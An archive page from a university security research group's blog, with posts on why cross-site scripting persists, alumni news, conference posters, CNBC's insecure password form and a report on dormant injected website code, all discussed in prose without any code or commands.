Archive for the 'Web Security' Category

Why hasn’t Cross-Site Scripting been solved?

Sunday, December 31st, 2017

By Haina Li

Introduction

In 2017, Bugcrowd reported that cross-site scripting (XSS) remains as the number one vulnerability found on the web, accounting for 25% of the bugs found and submitted to the bug bounty program. Additionally, XSS has remained in the top 3 on the list of the web’s top vulnerabilities for the recent years. Over the 17 years since XSS was first recognized by Microsoft in 2000, XSS has been the focus of intense academic research and development of penetration testing tools, yet we are still finding vulnerabilities even in top websites such as Facebook and Google. In this blog post, we explore some of the reasons why XSS is still a major problem today.

XSS has evolved

XSS evolved while modern applications became more complex than the static pages that they once were. While reflected and stored XSS have not disappeared because both server and client-side logic have become more elaborate, the pattern of replacing server-side logic with client-side JavaScript gave rise to DOM-Based vulnerabilities. Additionally, server-side XSS prevention tools that examined deviations between the request and response (XSSDS) do not work for DOM-Based vulnerabilities because the entire flow of malicious data from the source to the sink is contained within the browser and do not go through the server.

New methods that do prevent DOM-Based XSS attacks include XSS Filters and CSP. These myriad of sophisticated tools aimed to achieve the seemingly simple purpose of escaping user-provided content. As it stands currently, these tools are not able to catch all XSS vulnerabilities, and escaping everything all the time would break an web application altogether. For example, a recent work by Lekis et al. [PDF]
describes a new attack that was missed by every existing XSS prevention technique. In the new attack, the injected payload is benign-looking HTML but can be transformed by script gadgets to behave maliciously.

The effectiveness of web penetration tools are limited

In a study of automated black-box web application vulnerability testing by Bau et al. [PDF], researchers tested commercial scanners such as McAfee and IBM and found that the average scanner XSS vulnerability detection rates were 62.5, 15. and 11.25, respectively, for reflected, stored, and advanced XSS that used non-standard tags and keywords. The study found that the scanners were effective in finding straightforward, textbook XSS vulnerabilities, but lack sufficient modeling of more complex XSS with respect to the specific web application. Web application scanners are designed using a reactive approach, converting new vulnerabilities into test vectors only after they’ve become a problem. When it comes to stored XSS, XSS scanners also struggle to link an event to a subsequent, later observation. These scanners are also often difficult to configure and often take too long if they were set to fuzz every possible location in a large and complicated web application.

Conclusion

As with most web vulnerabilities, XSS is not going away anytime soon because of the constant evolving technologies of the web and the challenges in developing penetration tools with high true-positive rates. However, we may be able to eliminate most of the client-side security issues by replacing JavaScript with a new language that exhibits better control-flow integrity, such as WebAssembly.

Muzzammil Zaveri on Forbes 30 under 30

Wednesday, December 6th, 2017

Muzzammil Zaveri (BACS 2011) has been recognized by Forbes Magazine as one of the top 30 venture capitalists under 30. As an undergraduate researcher, Muzzammil worked on Guardrails (secure web application framework).

Forbes Recognition

UVa Today Article: Meet the 5 Alumni on Forbes’ new ‘30 under 30’ Lists, 15 November 2017.

Cavalier Daily Article: Forbes 30 under 30 recognizes five U.Va alumni, 4 December 2017.

Zaveri stressed the importance of pursuing passion and making positive use of free time while studying as an undergraduate.

“There’s nothing like being in a setting where you can make mistakes and explore interests,” he said. “Doing something that you’re strictly passionate about may not be the most productive — you can explore interests and area that you might be passionate about and that can be a great springboard into your own career, or whatever you decide to pursue in life after school.”

Zaveri believes he was very lucky with the connections he made at the University, especially with meeting his co-founder, Ethan Fast. He credits Evans, his advisor with empowering him with knowledge and encouraging him to learn more about tech startups.

“[Evans] really encouraged and spent time diving into startups and exploring some of my interests in building side projects,” he said. “And through that I met my co-founder [Ethan Fast] and ultimately, we ended up starting Proxino together.”

Alumna-Turned-Internet Security Expert Listed Among Nation’s Top Young Innovators

Friday, September 22nd, 2017

Adrienne Porter Felt (SRG BSCS 2008) was selected as one of Technology Review’s 35 Innovators Under 35.

UVA Today has an article:Alumna-Turned-Internet Security Expert Listed Among Nation’s Top Young Innovators, UVA Today, 21 September 2017.

Felt started working in security when she was a second-year engineering student, responding to a request from computer science professor David Evans, who taught the “Program and Data Representation” course. Evans said Felt stood out amongst her peers because of her “well-thought-out answers and meticulous diagrams.”

“For the summer after her second year, she joined a project one of my Ph.D. students was working on to use the disk drive controller to detect malware based on the reads and writes it makes that are visible to the disk,” Evans said. “She did great work on that project, and by the end of the summer was envisioning her own research ideas.

“She came up with the idea of looking at privacy issues in Facebook applications, which, back in 2007, was just emerging, and no one else was yet looking into privacy issues like this.”

Taking Evans’ offer for a research project was a turning point in Felt’s life, showing her something she liked that she could do well.

“It turned out that I really loved it,” she said. “I like working in privacy and security because I enjoy helping people control their digital experiences. I think of it as, ‘I’m professionally paranoid, so that other people don’t need to be.’”

In her final semester as an undergraduate student at UVA, Felt taught a student-led class on web browsers.

“Her work at Google has dramatically changed the way web browsers convey security information to users, making the web safer for everyone,” Evans said. “Her team at Google has been studying deployment of HTTPS, the protocol that allows web clients to securely communicate with servers, and has had fantastic success in improving security of websites worldwide, as well as a carefully designed plan to use browser interfaces to further encourage adoption of secure web protocols.

SRG at USENIX Security 2017

Saturday, August 12th, 2017

Several SRG students presented posters at USENIX Security Symposium in Vancouver, BC.


Approaches to Evading Windows PE Malware Classifiers
Anant Kharkar, Helen Simecek, Weilin Xu, David Evans, and Hyrum S. Anderson (Endgame)

JSPolicy: Policied Sandboxes for Untrusted Third-Party JavaScript
Ethan Lowman and David Evans
EvadeML-Zoo: A Benchmarking and Visualization Tool for Adversarial Machine Learning
Weilin Xu, Andrew Norton, Noah Kim, Yanjun Qi, and David Evans
Decentralized Certificate Authorities
Hannah Li, Bargav Jayaraman, and David Evans

Modest Proposals for Google

Friday, June 9th, 2017

Great to meet up with Wahooglers Adrienne Porter Felt, Ben Kreuter, Jonathan McCune, Samee Zahur (Google’s latest addition from my group), and (honorary UVAer interning at Google this summer) Riley Spahn at Google’s Research Summit on Security and Privacy this week in Mountain View.

As part of the meeting, the academic attendees were given a chance to give a 3-minute pitch to tell Google what we want them to do. The slides I used are below, but probably don’t make much sense by themselves.

The main modest proposal I tried to make is that Google should take it on as their responsibility to make sure nothing bad ever happens to anyone anywhere. They can start with nothing bad ever happening on the Internet, but with the Internet pretty much everywhere, should expand the scope to cover everywhere soon.

To start with an analogy from the days when Microsoft ruled computing. There was a time when Windows bluescreens were a frequent experience for most Windows users (and at the time, this pretty much mean all computer users). Microsoft analyzed the crashes and concluded that nearly all were because of bugs in device drivers, so it wasn’t their fault and was horribly unfair for them to be blamed for the crashes. Of course, to people losing their work because of a crash, it doesn’t really matter who’s code was to blame. By the end of the 90s, though, Microsoft took on the mission of reducing the problems with device drivers, and a lot of great work came out of this (e.g., the Static Driver Verifier), with dramatic improvements on the typical end user’s computing experience.

Today, Google rules a large chunk of computing. Lots of bad things happen on the Internet that are not Google’s fault. As the latest example in the news, the leaked NSA report of Russian attacks on election officials describes a phishing attack that exploits vulnerabilities in Microsoft Word. Its easy to put the blame on overworked election officials who didn’t pay enough attention to books on universal computation they read when they were children, or to put it on Microsoft for allowing Word to be exploited.

But, Google’s name is also all over this report – the emails when through gmail accounts, the attacks phished for Google credentials, and the attackers used plausibly-named gmail accounts. Even if Google isn’t too blame for the problems that enable such an attack, they are uniquely positioned to solve it, both because of their engineering capabilities and resources, but also because of the comprehensive view they have of what happens on the Internet and powerful ability to influence it.

Google is a big company, with lots of decentralized teams, some of which definitely seem to get this already. (I’d point to the work the Chrome Security Team has done, MOAR TLS, and RAPPOR as just a few of many examples of things that involve a mix of techincal and engineering depth and a broad mission to make computing better for everyone, not obviously connected to direct business interests.) But, there are also lots of places where Google doesn’t seem to be putting serious efforts into solving problems they could but viewing them as outside scope because its really someone else’s fault (my particular motivating example was PDF malware). As a company, Google is too capable, important, and ubiquitous to view problems as out-of-scope just because they are obviously undecidable or obviously really someone else’s fault.



[Also on Google +]

Insecure by Default? Authentication Services in Popular Web Frameworks

Monday, August 15th, 2016

Hannah Li presented a poster at USENIX Security Symposium on how popular web frameworks perform authentication.



Insecure by Default? Authentication Services in Popular Web Frameworks
[Abstract (PDF)] [Poster (PDF)]

The work studies how different design choices made by web frameworks impact the security of web applications built by typical developers using those frameworks, with a goal of understanding the usability and performance trade-offs that lead frameworks to adopt insecure defaults, and develop alternatives that lead to better security without sacrificing the needs of easy initial development and deployment.

An exercise in password security went terribly wrong, security experts say

Friday, April 1st, 2016

PCWord has a story about CNBC’s attempt to “help” people measure their password security: CNBC just collected your password and shared it with marketers: An exercise in password security went terribly wrong, security experts say, 29 March 2016.

Adrienne Porter Felt, a software engineer with Google’s Chrome security team, spotted that the article wasn’t delivered using SSL/TLS (Secure Socket Layer/Transport Layer Security) encryption.

SSL/TLS encrypts the connection between a user and a website, scrambling the data that is sent back and forth. Without SSL/TLS, someone one the same network can see data in clear text and, in this case, any password sent to CNBC.

“Worried about security? Enter your password into this @CNBC website (over HTTP, natch). What could go wrong,” Felt wrote on Twitter. “Alternately, feel free to tweet your password @ me and have the whole security community inspect it for you.”

The form also sent passwords to advertising networks and other parties with trackers on CNBC’s page, according to Ashkan Soltani, a privacy and security researcher, who posted a screenshot.

Despite saying the tool would not store passwords, traffic analysis showed it was actually storing them in a Google Docs spreadsheet, according to Kane York, who works on the Let’s Encrypt project.

(Posted on April 1, but this is actually a real story, as hard as that might be to believe.)

Dormant Malicious Code Discovered on Thousands of Websites

Tuesday, December 29th, 2015

Here’s the latest from Yuchen Zhou (PhD 2015, now at Palo Alto Networks): Dormant Malicious Code Discovered on Thousands of Websites, Yuchen Zhou and Wei Xu, Palo Alto Networks Blog, 14 November 2015.



During our continuous monitoring for a 24-hour period from November 11, 2015 to November 12, 2015, eight days after the initial discovery, the Chuxiong Archives website consistently presented malicious content injected by an attacker depending on the source IP and user agent. We believe that if a user were to visit the compromised website a second time following the initial exposure to the malicious code, the site would recognize the source IP and user-agent and simply remain dormant, not exhibiting any malicious behavior. Because of this anti-analysis/evasion technique, it may easily cause the belief that a website no longer poses a threat, when it remains infected.

At the time of this report, using our malicious web content scanning system, we have already discovered more than four thousands additional, similarly compromised websites globally exhibiting the same ability of being able to be dormant or active depending on source IP and user agent. Investigations regarding this campaign on a larger scale are ongoing and a second report detailing the similarly compromised websites will be published in the near future.

Computer Science Grad Stands Watch for Users of Google’s Popular Browser

Tuesday, December 8th, 2015

Adrienne Porter Felt (BSCS 2008) returned to UVa last Friday as a Distinguished Alumni Speaker. UVa Today published this article:

Computer Science Grad Stands Watch for Users of Google’s Popular Browser
, UVa Today, 7 December 2015.

Adrienne Porter Felt’s job is to keep you secure on Chrome.

Felt, 29, who earned a computer science degree from the University of Virginia in 2008, leads the usable security team at Google working on the popular Internet browser.

Taking Evans’ offer for a research project was a turning point in Felt’s life, showing her something she liked that she could do well.

“It turned out that I really loved it,” she said. “I like working in privacy and security because I enjoy helping people control their digital experiences. I think of it as, ‘I’m professionally paranoid so that other people don’t need to be.’”

SRG at Oakland 2015

Sunday, May 24th, 2015

Several SRGers were at IEEE Symposium on Security and Privacy (“Oakland” in San Jose).

Yuchen Zhou presented his work on Understanding and Monitoring Embedded Web Scripts. Yuchen graduated with his PhD the day before the conference, and will be joining Palo Alto Networks.

Samee Zahur is a co-author (along with Benjamin Kreuter, who is an “in-progress UVa PhD student” diverted by Google, and several researchers from Microsoft Research) on the paper, Geppetto: Versatile Verifiable Computation, which was presented by Bryan Parno.

Samee also presented a poster on Obliv-C.

Weilin Xu presented a poster on Automatically Evading Classifiers

It was also great to see SRG alums Yan Huang (who is not at Indiana University, and was a co-author on the paper about ObliVM), Jon McCune (who is now working on trusted computing at Google) and Adrienne Felt (who was the keynote speaker for the W2SP workshop, and gave a very interesting talk about user-facing security design and experiments in Google Chrome; Adrienne’s first paper was in W2SP 2008 when she was an undergraduate at UVa).